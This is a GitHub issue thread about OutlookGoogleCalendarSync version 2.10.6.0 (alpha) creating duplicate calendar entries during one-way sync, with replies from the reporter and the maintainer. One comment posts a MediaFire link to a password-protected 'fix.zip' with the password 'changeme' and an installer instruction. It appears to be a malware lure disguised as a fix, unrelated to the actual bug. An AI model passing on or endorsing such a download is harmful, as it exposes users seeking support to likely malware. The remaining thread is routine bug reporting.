### ISSUE TITLE
Version 2.10.6.0 (alpha) creates multiple calendar entries for same event

### ISSUE THREAD

**Issue by Ferris321** [phw198/OutlookGoogleCalendarSync#1953]
I just installed the new version 2.10.6.0 (alpha) portable today.
I am using OCGS for years now and it has been running stable at the pre latest version so far.

Since using the new version 2.10.6.0 (alpha) portable OGCS keeps creating duplicates of existing calendar entries when I run the sync.
In detail my settings are to only copy calendar entries one way from Outlook to Google.
Every time the sync runs it creates another duplicate for all existing calendar entries. My settings are set to 
[x] Merge with existing entries
so I think duplicates should not be created.

Please advise how to solve this issue and let me know if you need more details.

[OGcalsync.log](https://github.com/user-attachments/files/16781685/OGcalsync.log)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by phw198** [comment]
@Ferris321 You were able to resolve this? If so, might be helpful if you could share the solution in case it could help other users. Thanks!

**Comment by Ferris321** [comment]
@phw198 unfortunately the problem still exists. I just opened a new ticket to state that I now updated to the latest available version. Please still have a look into it, as I can not use OGCS like this anymore if it keeps creating more and more duplicates of calendar entries! Let me know if you need more details. Thanks in advance

**Comment by Ferris321** [comment]
Problem is further discussed here: https://github.com/phw198/OutlookGoogleCalendarSync/issues/1961
